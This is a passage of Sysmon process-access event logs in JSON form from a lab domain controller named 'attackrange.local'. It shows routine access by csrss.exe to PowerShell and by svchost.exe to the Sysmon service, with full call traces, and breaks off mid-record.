{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5260,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.937\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-00104D270A00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.937","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-00104D270A00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5261,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.937\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.937","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5262,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.937\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.937","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5263,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.937\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.937","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5264,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.937\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.937","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5265,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.937\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.937","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5266,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.937\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.937","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5267,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.937\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.937","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5268,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.937\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 